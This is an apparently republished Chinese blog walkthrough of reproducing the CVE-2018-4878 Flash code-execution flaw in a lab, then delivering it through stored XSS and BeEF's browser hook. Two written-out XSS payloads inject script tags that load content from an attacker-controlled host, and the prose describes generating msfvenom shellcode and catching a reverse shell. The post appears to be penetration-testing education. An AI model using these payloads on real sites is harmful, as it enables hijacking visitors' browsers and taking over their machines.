前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【漏洞复现】BeEF与CVE-2018-4878漏洞利用

【漏洞复现】BeEF与CVE-2018-4878漏洞利用

作者头像
一名白帽的成长史
发布2019-12-26 13:59:09
1.1K0
发布2019-12-26 13:59:09
举报
文章被收录于专栏:一名白帽的成长史

Hello,各位小伙伴大家好~

这里是你们消失已久的小编...

拖更一时爽,一直拖更一直爽...

今天来看看CVE-2018-4878结合BeEF的利用吧~

Part.1

CVE-2018-4878

漏洞利用

CVE-2018-4878:

攻击者可以构造特殊的Flash链接,一旦用户用浏览器等方式访问此Flash链接,就会被“远程代码执行”,直接被getshell。

针对此漏洞,网上已经有成熟的利用代码了,公众号直接回复CVE-2018-4878即可下载。来看看怎么利用吧~

首先使用msfvenom生成一段python类型的shell代码:

查看生成的代码如下:

然后我们打开下载的CVE-2018-4878利用脚本,将以下部分替换为上面的代码即可:

查看该利用脚本,可以看到脚本执行后会在root目录下生成两个文件:

通过python执行脚本:

接着开启apache2服务,并将生成的两个文件剪切到apache根目录下:

在kali上开启监听,接收反弹shell:

攻击端配置完毕~~

在靶机需要安装版本<= 28.0.0.137的flash,公众号直接回复CVE-2018-4878即可下载:

安装完毕后,使用浏览器访问kali攻击页面:

可以看到kali顺利getshell:

查看靶机系统信息:

如果此时靶机关闭浏览器,session则会断开:

注:如果浏览器版本过高,访问攻击页面时,浏览器不会执行flash插件:

//此处为firefox 71.0,需要手动点击执行flash才行。

Part.2

BeEF

BeEF的利用

在前面我们讲过使用存储型XSS进行网页挂马:

【XSS漏洞】通过XSS实现网页挂马

这里我们也来试试这种操作。

公众号回复CVE-2018-4878,下载安装存在存储型XSS的Catfishcms(DVWA也可以)

该CMS评论区存在存储型XSS:

留言后使用burp抓包,插入以下js脚本:

</tExtArEa>'"><sCRiPt sRC=http://192.168.31.54/index2.html></sCrIpT>

访问评论区,可以看到留言成功:

查看网页源代码,成功插入XSS:

但是kali并没有getshell:

是因为这种方法并不会执行flash脚本。

这里我们试试一款kali自带的工具beef-xss:

运行beef:

访问http://192.168.31.54:3000/ui/authentication即可登陆:

//登录名和密码默认都是:beef

我们将hook.js页面插入到存储型XSS处:

使用burp发包:</tExtArEa>'"><sCRiPt sRC=http://192.168.31.54:3000/hook.js></sCrIpT>

查看评论区留言:

可以看到BeEF上,靶机顺利上线:

在指令区使用重定向功能,将网页重定向到前面的攻击页面:

靶机的浏览器就会自动跳转到攻击页面,执行flash插件:

再查看kali,会发现成功getshell:

撒花完结~~

Part.3

结语

好啦,以上就是今天的全部内容了~

Peace!

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-12-12,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 一名白帽的成长史 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档